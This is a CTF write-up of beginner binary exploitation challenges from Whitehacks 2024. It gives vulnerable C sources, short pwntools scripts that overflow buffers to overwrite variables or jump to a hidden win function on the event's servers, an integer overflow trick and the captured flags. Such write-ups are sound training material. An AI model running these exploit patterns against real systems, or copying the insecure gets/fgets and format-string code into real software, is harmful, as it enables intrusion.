Binary exploitation challenges in Whitehacks 2024
Connect
Flag: WH2024{netcat_is_easy}
login
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#define FLAGSIZE 64
void print_flag(){
char flag[FLAGSIZE];
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("Flag File is Missing.\n");
exit(0);
}
fgets(flag,FLAGSIZE,f);
printf(flag);
}
int main(int argc, char** argv) {
setvbuf(stdout, NULL, _IONBF, 0);
char buffer[32] = {0x00};
printf("%s", "Login: ");
fgets(buffer, sizeof(buffer), stdin);
if (strcmp(buffer, "Weje\n") == 0){
printf("%s", "Password: ");
fgets(buffer, sizeof(buffer), stdin);
if (strcmp(buffer, "P@SSW0RD\n") == 0){
printf("%s\n", "Login passed! Here is your flag.");
print_flag();
} else {
printf("%s\n", "Invalid password!");
}
} else {
printf("%s\n", "Invalid Username.");
}
}
Shows the 2 passwords we need to input: Weje and P@SSW0RD
Flag: WH2024{L0g1n_successf00l}
endianajones
Used CyberChef to swap endianess
Flag: WH2024{D0nt_c4ll_m3_litt1e}
variedfun
#include <stdio.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#define FLAGSIZE 64
char flag[FLAGSIZE];
void win(){
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("Flag File is Missing.\n");
exit(0);
}
fgets(flag,FLAGSIZE,f);
printf(flag);
return;
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0); // clears standard output, you don't need to know this
volatile int target; // this guy here is one you want to change
char buffer[64] = {0x00}; // this guy here can fit 64 characters
target = 0;
printf("Target is currently set to %d, overflow buffer and change 'target'!\n", target);
printf("Gimme input: ");
gets(buffer); // gets is an insecure function that allows you to input as many characters as you want to buffer.
if (target != 0) {
printf("You have changed the 'target' variable!\n");
win();
} else {
printf("Nope, target is still %d\n", target);
}
}
Simple variable overwrite:
from pwn import *
context.log_level = 'error'
r = remote('ctf.whitehats.site', 14004)
payload = b'A' * 64 + b'\x01\x00\x00\x00'
r.sendline(payload)
r.interactive()
Flag: WH2024{Im_1337_hakkerman_lmao}
Beefy-Variable
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#define FLAGSIZE 64
char flag[FLAGSIZE];
void win(){
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("Flag File is Missing.\n");
exit(0);
}
fgets(flag,FLAGSIZE,f);
printf(flag);
return;
}
void vulnerable() {
volatile long val = 0x12345678;
char buf[64] = {0x00};
printf("The flag can only be touched when val is altered, you can never figure it out!\n");
fgets(buf, 69, stdin);
printf("buf: %s\n",buf);
printf("val: 0x%08x\n",val);
if (val == 0xdeadbeef)
win();
else {
printf("Nope.");
exit(1);
}
return;
}
int main() {
setvbuf(stdout, NULL, _IONBF, 0);
vulnerable();
return 0;
}
Another simple variable overwrite:
from pwn import *
context.log_level = 'error'
r = remote('ctf.whitehats.site', 14005)
r.sendline(b'A'*64 + p32(0xdeadbeef))
r.interactive()
Flag: WH2024{H0w_d1d_you_f1gur3_i+_0ut!?}
secretfunction
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#define FLAGSIZE 64
char flag[FLAGSIZE];
void secret(){
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("Flag File is Missing.\n");
exit(0);
}
fgets(flag,FLAGSIZE,f);
printf("%s\n", flag);
}
void vulnerable() {
char buf[64] = {0x00};
gets(buf);
puts("Maybe you will find it next time");
return;
}
int main() {
setvbuf(stdout, NULL, _IONBF, 0);
puts("Hidden in me is a function that leads you to the flag, can you find it?");
vulnerable();
}
Use ropper to get address of ret and address of win, played around with offset to get correct offset. Since somethings wrong with the server the flag only shows 6% of the time so it is in a while loop.
from pwn import *
context.log_level = 'error'
offset = 68
ret = 0x0804900a
win = 0x080491b2
while 1:
r = remote('ctf2.whitehats.site', 2008)
payload = b'A' * offset + p32(win) + p32(ret)
r.sendline(payload)
r.recvuntil(b'Maybe you will find it next time\n')
try:
a = r.recvline().decode()
if 'WH2024' in a:
print(a)
break
except:
pass
Flag: WH2024{1m_h1dd3n_in_s3cret}
Cost-of-Living-Vouchers
Shows a menu with choices to use money and check money. Realised it is possibly integer overflow.
Cannot buy the flag, need more money. I try to play around with what I can withdraw.
Looks like I got something using a number bigger than INTMAX.
Let me try buy a flag with this.
Still does not work.
I restarted it and used INTMAX + 10000 to withdraw:
Flag: WH2024{st0nk1ng_w17H_v0uch3r_0verfl0wS}